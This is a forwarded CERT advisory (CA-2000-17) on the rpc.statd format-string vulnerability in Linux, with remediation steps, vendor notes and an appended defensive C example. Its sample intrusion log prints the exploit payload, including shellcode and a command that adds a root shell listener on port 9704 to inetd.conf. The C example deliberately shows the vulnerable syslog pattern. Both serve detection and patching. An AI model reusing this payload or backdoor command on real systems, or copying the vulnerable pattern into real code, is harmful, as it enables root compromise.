----- Forwarded message from CERT Advisory <[EMAIL PROTECTED]> -----
> From: CERT Advisory <[EMAIL PROTECTED]>
> Reply-To: [EMAIL PROTECTED]
> Date: Fri, 18 Aug 2000 17:58:01 -0400 (EDT)
> To: [EMAIL PROTECTED]
> Subject: CERT Advisory CA-2000-17
>
> -----BEGIN PGP SIGNED MESSAGE-----
> Hash: SHA1
>
> CERT Advisory CA-2000-17 Input Validation Problem in rpc.statd
>
> Original release date: August 18, 2000
> Source: CERT/CC
>
> A complete revision history is at the end of this file.
>
> Systems Affected
>
> * Systems running the rpc.statd service
>
> Overview
>
> The CERT/CC has begun receiving reports of an input validation
> vulnerability in the rpc.statd program being exploited. This program
> is included, and often installed by default, in several popular Linux
> distributions. Please see Appendix A of this document for specific
> information regarding affected distributions.
>
> More information about this vulnerability is available at the
> following public URLs:
> * http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2000-0666
> * http://www.securityfocus.com/bid/1480
>
> I. Description
>
> The rpc.statd program passes user-supplied data to the syslog()
> function as a format string. If there is no input validation of this
> string, a malicious user can inject machine code to be executed with
> the privileges of the rpc.statd process, typically root.
>
> Intruder Activity
>
> The following is an example log message from a compromised system
> illustrating the rpc.statd exploit occurring:
>
> Aug XX 17:13:08 victim rpc.statd[410]: SM_MON request for hostname
> containing '/': ^D^D^E^E^F ^F^G^G08049f10 bffff754 000028f8 4d5f4d53
> 72204e4f 65757165 66207473 6820726f 6e74736f 20656d61 746e6f63
> 696e6961 2720676e 203a272f
> 00000000000000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000000bffff7
> 0400000000000000000000000000000000000000000000000bffff7050000bffff70600000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000000000000
> 0000000000000bffff707<90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> ><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90
> ><90><90><90><90><90><90><90><90><90><90><90><90><90><90><90>K^<89>v<83> <8D>^(
> <83> <89>^<83> <8D>^.<83> <83> <83>#<89>^
> 1<83>
> <88>F'<88>F*<83> <88>F<89>F+,
> <89><8D>N<8D>V<80>1<89>@<80>/bin
> /sh -c echo 9704 stream tcp
> nowait root /bin/sh sh -i >> /etc/inetd.conf;killall -HUP inetd
>
> If you see log entries similar to those above, we suggest you examine
> your system for signs of intrusion by following the steps outlined in
> our Intruder Detection Checklist. If you believe your host has been
> compromised, please follow our Steps for Recovering From a Root
> Compromise. Please check our Current Activity page for updates
> regarding intruder activity.
>
> II. Impact
>
> By exploiting this vulnerability, local or remote users may be able to
> execute arbitrary code with the privileges of the rpc.statd process,
> typically root.
>
> III. Solution
>
> Upgrade your version of rpc.statd
>
> Please see Appendix A of this advisory for more information about the
> availability of program updates specific to your system. If you are
> running a vulnerable version of rpc.statd, the CERT/CC encourages you
> to apply appropriate vendor patches. After making any updates, be sure
> to restart the rpc.statd service.
>
> Disable the rpc.statd service
>
> If an update cannot be applied, the CERT/CC recommends disabling the
> rpc.statd service. We advise proceeding with caution, however, as
> disabling this process can interfere with NFS functionality.
>
> Block unneeded ports at your firewall
>
> As a good security practice in general, the CERT/CC recommends
> blocking unneeded ports at your firewall. This option does not remedy
> the vulnerability, but does prevent outside intruders from exploiting
> it. In particular, block port 111 (portmapper), as well as the port on
> which rpc.statd is running, which may vary.
>
> Appendix A. Vendor Information
>
> This section contains information provided by vendors for this
> advisory. We will update this appendix as we receive more information.
> If you do not see your vendor's name, the CERT/CC did not receive a
> response from that vendor. Please contact your vendor directly.
>
> Berkeley Software Design, Inc. (BSDI)
>
> No versions of BSD/OS are vulnerable.
>
> Caldera, Inc.
>
> Not vulnerable: None of our products ship with rpc.statd
>
> Compaq
>
> At the time of writing this document, Compaq is currently
> investigating the potential impact to Compaq's rpc.statd service.
> Initial tests indicate it is not a potential vulnerability for Compaq
> supplied software.
>
> As further information becomes available Compaq will provide notice of
> the completion/availability of any necessary patches through AES
> services (DIA, DSNlink FLASH and posted to the Services WEB page) and
> be available from your normal Compaq Services Support channel.
>
> Debian
>
> http://www.debian.org/security/2000/20000719a
>
> FreeBSD
>
> FreeBSD is not vulnerable to this problem.
>
> NetBSD
>
> NetBSD 1.4.x and NetBSD 1.5 do not appear to be affected by this
> problem; all calls to syslog() within rpc.statd take a constant string
> for the format argument.
>
> OpenBSD
>
> *Linux* systems running the rpc.statd service!
> This affects no one else!
>
> RedHat
>
> http://www.redhat.com/support/errata/RHSA-2000-043-03.html
>
> Silicon Graphics, Inc.
>
> IRIX rpc.statd is not vulnerable to this security issue.
> _________________________________________________________________
>
> Authors: John Shaffer, Brian King
> ______________________________________________________________________
>
> This document is available from:
> http://www.cert.org/advisories/CA-2000-17.html
> ______________________________________________________________________
>
> CERT/CC Contact Information
>
> Email: [EMAIL PROTECTED]
> Phone: +1 412-268-7090 (24-hour hotline)
> Fax: +1 412-268-6989
> Postal address:
> CERT Coordination Center
> Software Engineering Institute
> Carnegie Mellon University
> Pittsburgh PA 15213-3890
> U.S.A.
>
> CERT personnel answer the hotline 08:00-20:00 EST(GMT-5) / EDT(GMT-4)
> Monday through Friday; they are on call for emergencies during other
> hours, on U.S. holidays, and on weekends.
>
> Using encryption
>
> We strongly urge you to encrypt sensitive information sent by email.
> Our public PGP key is available from
>
> http://www.cert.org/CERT_PGP.key
>
> If you prefer to use DES, please call the CERT hotline for more
> information.
>
> Getting security information
>
> CERT publications and other security information are available from
> our web site
>
> http://www.cert.org/
>
> To be added to our mailing list for advisories and bulletins, send
> email to [EMAIL PROTECTED] and include SUBSCRIBE
> your-email-address in the subject of your message.
>
> * "CERT" and "CERT Coordination Center" are registered in the U.S.
> Patent and Trademark Office.
> ______________________________________________________________________
>
> NO WARRANTY
> Any material furnished by Carnegie Mellon University and the Software
> Engineering Institute is furnished on an "as is" basis. Carnegie
> Mellon University makes no warranties of any kind, either expressed or
> implied as to any matter including, but not limited to, warranty of
> fitness for a particular purpose or merchantability, exclusivity or
> results obtained from use of the material. Carnegie Mellon University
> does not make any warranty of any kind with respect to freedom from
> patent, trademark, or copyright infringement.
> _________________________________________________________________
>
> Conditions for use, disclaimers, and sponsorship information
>
> Copyright 2000 Carnegie Mellon University.
>
> Revision History
> August 18, 2000: Initial release
>
> -----BEGIN PGP SIGNATURE-----
> Version: PGP for Personal Privacy 5.0
> Charset: noconv
>
> iQA/AwUBOZ2tv1r9kb5qlZHQEQKPhwCfVPCFRgGcLymQ/SiMh1hHr0r1/CkAn04x
> BWp9xn1wq0xkW49b7dFnHr7l
> =l/C2
> -----END PGP SIGNATURE-----
>
----- End forwarded message -----
--------------------------------------------------------------------------
To unsubscribe, send an email to [EMAIL PROTECTED]
Archive information is at http://www.linux.or.id/milis.php3
The list administrators can be reached at [EMAIL PROTECTED]
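Added example in C, not code from the advisory, from CERT, or from any rpc.statd implementation. It ties the Description and Intruder Activity sections of the forwarded advisory together: the syslog() call pattern that makes peer-supplied data the format string, beside the constant-format fix that NetBSD's Appendix A entry describes, and a scan over constructed syslog lines for the `SM_MON request for hostname containing '/':` prefix the sample log shows. The `log_fmt` stand-in for syslog(3), every function name, and the sample log lines are assumptions of this example.

```c
/* Added example for CA-2000-17 (not the advisory's or any rpc.statd code).
 * log_fmt, the function names and SAMPLE_LOG are assumptions of this example. */
#include <ctype.h>
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Stand-in for syslog(3) that formats into a caller buffer, so the two
 * call patterns below can be compared without involving syslogd. */
static void log_fmt(char *out, size_t outsz, const char *fmt, ...)
{
    va_list ap;
    va_start(ap, fmt);
    vsnprintf(out, outsz, fmt, ap);
    va_end(ap);
}

/* VULNERABLE pattern (the shape of the defect the advisory describes): the
 * peer-supplied hostname is itself the format string, so any '%' directive
 * in it is interpreted. Behaviour is undefined for such input; main() only
 * calls this with a constant, directive-free string. */
static void log_hostname_vulnerable(char *out, size_t outsz, const char *host)
{
    log_fmt(out, outsz, host);   /* cc -Wformat-security flags this line */
}

/* FIXED pattern: constant format string, data passed as an argument, which
 * is the property NetBSD's Appendix A entry cites for its rpc.statd. */
static void log_hostname_fixed(char *out, size_t outsz, const char *host)
{
    log_fmt(out, outsz, "SM_MON request for hostname containing '/': %s", host);
}

/* Returns 1 when the fixed wrapper leaves '%' directives as literal text. */
static int fixed_keeps_directives_literal(void)
{
    char buf[256];
    log_hostname_fixed(buf, sizeof buf, "host%x%x");
    return strstr(buf, "host%x%x") != NULL;
}

/* Message prefix rpc.statd writes, quoted from the advisory's sample log. */
static const char SM_MON_MARKER[] = "SM_MON request for hostname containing '/': ";

/* Returns 1 if a syslog line has the SM_MON prefix followed by a payload no
 * real hostname would carry: over 255 bytes, raw control or high bytes, a
 * "<90>"-style rendering of such a byte, or a '%' format directive. */
static int line_looks_like_statd_exploit(const char *line)
{
    const char *p = strstr(line, "rpc.statd");
    if (p == NULL || (p = strstr(p, SM_MON_MARKER)) == NULL)
        return 0;
    p += sizeof SM_MON_MARKER - 1;
    if (strlen(p) > 255)
        return 1;
    for (const char *q = p; *q; q++) {
        unsigned char c = (unsigned char)*q;
        if (c >= 0x80 || (c < 0x20 && c != '\t') || c == '%')
            return 1;
        if (c == '<' && isxdigit((unsigned char)q[1]) &&
            isxdigit((unsigned char)q[2]) && q[3] == '>')
            return 1;
    }
    return 0;
}

/* Counts matching lines in newline-separated syslog text. */
static int count_statd_exploit_lines(const char *text)
{
    int hits = 0;
    char line[1024];
    while (*text) {
        size_t n = strcspn(text, "\n");
        size_t copy = n < sizeof line - 1 ? n : sizeof line - 1;
        memcpy(line, text, copy);
        line[copy] = '\0';
        hits += line_looks_like_statd_exploit(line);
        text += n + (text[n] == '\n');
    }
    return hits;
}

/* Constructed sample log (not real data): a benign SM_MON message, one in
 * the shape of the advisory's example with the payload cut short, one
 * carrying format directives, and one unrelated line. */
static const char SAMPLE_LOG[] =
    "Aug 18 17:13:08 victim rpc.statd[410]: SM_MON request for hostname containing '/': nfs/client.example\n"
    "Aug 18 17:13:09 victim rpc.statd[410]: SM_MON request for hostname containing '/': ^D^D^E^E08049f10 bffff754<90><90><90>\n"
    "Aug 18 17:13:10 victim rpc.statd[410]: SM_MON request for hostname containing '/': a/b%n%n%n\n"
    "Aug 18 17:13:11 victim sshd[512]: Accepted publickey for alice\n";

int main(void)
{
    char buf[256];
    log_hostname_vulnerable(buf, sizeof buf, "example.com");  /* benign constant */
    printf("vulnerable pattern, benign input: %s\n", buf);
    printf("fixed pattern keeps directives literal: %d\n", fixed_keeps_directives_literal());
    printf("suspicious rpc.statd lines in sample log: %d\n", count_statd_exploit_lines(SAMPLE_LOG));
    return 0;
}
```

Build with `cc -Wall -Wformat=2 statd_demo.c`; the warning on the vulnerable call is the compile-time check that catches this class of bug before it ships. The detector treats a `<90>`-style token as an escaped byte because that is how the advisory's syslog rendering shows the payload; a log that stores raw bytes instead is caught by the high-byte test, and the length bound catches the long hex runs even when a logger strips everything non-printable.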
